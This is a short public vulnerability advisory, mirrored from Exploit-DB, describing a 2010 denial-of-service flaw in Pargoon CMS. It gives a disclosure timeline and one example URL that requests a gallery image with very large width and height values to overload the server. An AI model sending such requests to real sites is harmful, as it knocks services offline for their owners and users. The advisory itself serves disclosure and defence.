Pargoon CMS – Denial of Service - 体验盒子

作者： Pouya Daneshmand

日期： 2010-05-10

类别：

dos

平台：

multiple

来源：https://www.exploit-db.com/exploits/12555/

#################################################################
# Securitylab.ir
#################################################################
# Application Info:
# Name: Pargoon
# Vendor: http://www.vestasoft.ir
#################################################################
# Vulnerability Info:
# Type: DOS
# Risk: Medium
# 2010-01-17 - Found Vulnerability
# 2010-01-19 - Vendor notified
# 2010-05-08 - Public disclosure
#################################################################
Vulnerability:
http://site.irPhotoGallery/General+Photos/160.jpg?Width=10000&Height=10000
With setting of large values of width and height it's possible to create
large load at the server.
#################################################################
# Discoverd By: Pouya Daneshmand
# Website: http://Pouya.Securitylab.ir
# Contacts: info[at]securitylab.ir & whh_iran[at]yahoo.com
###################################################################